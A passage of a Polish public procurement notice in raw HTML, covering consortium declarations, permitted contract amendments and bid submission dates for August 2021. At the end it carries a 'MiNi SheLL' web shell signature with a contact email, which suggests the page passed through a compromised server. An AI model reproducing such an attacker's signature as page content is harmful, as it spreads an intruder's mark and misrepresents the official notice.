każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. Oświadczenia te są składane wraz z ofertą.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które dostawy/usługi wykonają poszczególni wykonawcy. Wzór oświadczenia stanowi załącznik nr 6 do SWZ.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość wprowadzenia zmian do treści zawartej umowy, w zakresie następującym:<br/>1) zmiany powszechnie obowiązujących przepisów prawa lub wynikających z prawomocnych orzeczeń lub ostatecznych aktów administracyjnych właściwych organów - w takim zakresie w jakim będzie to niezbędne w celu dostosowania postanowień Umowy do zaistniałego stanu prawnego lub faktycznego;<br/>2) wystąpienia siły wyższej - rozumianej jako wystąpienie zdarzenia nadzwyczajnego, zewnętrznego, niemożliwego do przewidzenia i zapobieżenia, którego nie dało się uniknąć nawet przy zachowaniu najwyższej staranności, a które umożliwia Wykonawcy wykonanie jego zobowiązania w całości lub części. W razie wystąpienia siły wyższej Strony Umowy zobowiązane są dołożyć wszelkich starań w celu ograniczenia do minimum opóźnienia w<br/>wykonywaniu swoich zobowiązań umownych, powstałych na skutek działania siły wyższej;<br/>3) zmiany okresu kredytowania,<br/>4) zmianę danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana rachunku bankowego) oraz zmianę w przypadku wystąpienia rozbieżności lub niejasności w rozumieniu użytych pojęć w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony.<br/>Zmiany jak powyżej wymagają zachowania formy pisemnej (aneks) oraz pisemnego wniosku jednej ze stron o zmianę wraz z uzasadnieniem. Fakt zaistnienia powyższych okoliczności podlegać będzie każdorazowo ocenie Zamawiającego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-31 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">za pośrednictwem Plarformy na adres: https://bukowiec.ezamawiajacy.pl wg zasad okreslonych w rozdziale XII. Rozdział II</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-31 12:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com